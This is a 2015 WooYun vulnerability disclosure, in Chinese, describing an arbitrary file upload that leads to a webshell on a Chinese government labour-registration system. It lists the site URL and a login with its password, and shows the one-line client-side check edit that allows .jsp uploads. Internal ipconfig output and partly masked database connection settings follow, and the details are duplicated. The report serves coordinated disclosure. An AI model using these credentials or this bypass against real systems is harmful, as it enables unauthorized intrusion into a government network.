当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127621

漏洞标题:劳动用工备案管理信息系统某应用设计不当导致getshell

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-07-21 19:05

修复时间:2015-09-07 16:06

公开时间:2015-09-07 16:06

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-08-03: 细节向核心白帽子及相关领域专家公开
2015-08-13: 细节向普通白帽子公开
2015-08-23: 细节向实习白帽子公开
2015-09-07: 细节向公众公开

简要描述:

劳动用工备案管理信息系统某应用设计不当导致getshell+内网漫游

详细说明:

网址:http://ptpm.mohrss.gov.cn:8080/
用户名:wangxiangyu
密码:888888

1.png


上传头像处存在任意文件上传。、

function checkPic(){
				var picPath=document.getElementById("picPath").value;
				var type=picPath.substring(picPath.lastIndexOf(".")+1,picPath.length).toLowerCase();
	  			if(type!="jpg"&&type!="bmp"&&type!="gif"&&type!="png"){
		   			alert("请上传正确的图片格式");
		 			return ;
	 			}
	 		}
	 	function closeWin(){
			window.close();
		}


直接改下就可以上传了。

if(type!="jpg"&&type!="bmp"&&type!="gif"&&type!="png"&&type!="jsp"){


然后直接上传jsp文件,或许shell。

2.png


直接内网渗透,因为是政府敏感单位,不敢深入了。

C:\pmis2\> ipconfig
Windows IP 配置
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::2078:9363:f0f3:2ae8%12
   IPv4 地址 . . . . . . . . . . . . : 10.1.112.63
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.1.112.254
隧道适配器 isatap.{7C9B5EB9-CA25-4E51-8077-9CE8AFC019FC}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
隧道适配器 本地连接* 6:
   连接特定的 DNS 后缀 . . . . . . . : 
   IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:90d7:1cba:173c:f5fe:8fc0
   本地链接 IPv6 地址. . . . . . . . : fe80::1cba:173c:f5fe:8fc0%11
   默认网关. . . . . . . . . . . . . : ::


#jdbc.driverClassName = oracle.jdbc.driver.OracleDriver
#jdbc.url = jdbc\:oracle\:thin\:@192.168.1.246\:1521\:lbsdata
#jdbc.username = pm**
#jdbc.password =pm**
jdbc.driverClassName = oracle.jdbc.driver.OracleDriver
jdbc.url = jdbc\:oracle\:thin\:@10.1.70.31\:1521\:orcl
jdbc.username = pmi**
jdbc.password =pmi**
#jdbc.driverClassName = oracle.jdbc.driver.OracleDriver
#jdbc.url = jdbc\:oracle\:thin\:@192.168.1.210\:1521\:orcl
#jdbc.username = pm**
#jdbc.password =pm**

漏洞证明:

网址:http://ptpm.mohrss.gov.cn:8080/
用户名:wangxiangyu
密码:888888

1.png


上传头像处存在任意文件上传。、

function checkPic(){
				var picPath=document.getElementById("picPath").value;
				var type=picPath.substring(picPath.lastIndexOf(".")+1,picPath.length).toLowerCase();
	  			if(type!="jpg"&&type!="bmp"&&type!="gif"&&type!="png"){
		   			alert("请上传正确的图片格式");
		 			return ;
	 			}
	 		}
	 	function closeWin(){
			window.close();
		}


直接改下就可以上传了。

if(type!="jpg"&&type!="bmp"&&type!="gif"&&type!="png"&&type!="jsp"){


然后直接上传jsp文件,或许shell。

2.png


直接内网渗透,因为是政府敏感单位,不敢深入了。

C:\pmis2\> ipconfig
Windows IP 配置
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::2078:9363:f0f3:2ae8%12
   IPv4 地址 . . . . . . . . . . . . : 10.1.112.63
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.1.112.254
隧道适配器 isatap.{7C9B5EB9-CA25-4E51-8077-9CE8AFC019FC}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
隧道适配器 本地连接* 6:
   连接特定的 DNS 后缀 . . . . . . . : 
   IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:90d7:1cba:173c:f5fe:8fc0
   本地链接 IPv6 地址. . . . . . . . : fe80::1cba:173c:f5fe:8fc0%11
   默认网关. . . . . . . . . . . . . : ::


#jdbc.driverClassName = oracle.jdbc.driver.OracleDriver
#jdbc.url = jdbc\:oracle\:thin\:@192.168.1.246\:1521\:lbsdata
#jdbc.username = pm**
#jdbc.password =pm**
jdbc.driverClassName = oracle.jdbc.driver.OracleDriver
jdbc.url = jdbc\:oracle\:thin\:@10.1.70.31\:1521\:orcl
jdbc.username = pmi**
jdbc.password =pmi**
#jdbc.driverClassName = oracle.jdbc.driver.OracleDriver
#jdbc.url = jdbc\:oracle\:thin\:@192.168.1.210\:1521\:orcl
#jdbc.username = pm**
#jdbc.password =pm**

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-24 16:04

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置. 同时发北京分中心处置。

最新状态:

暂无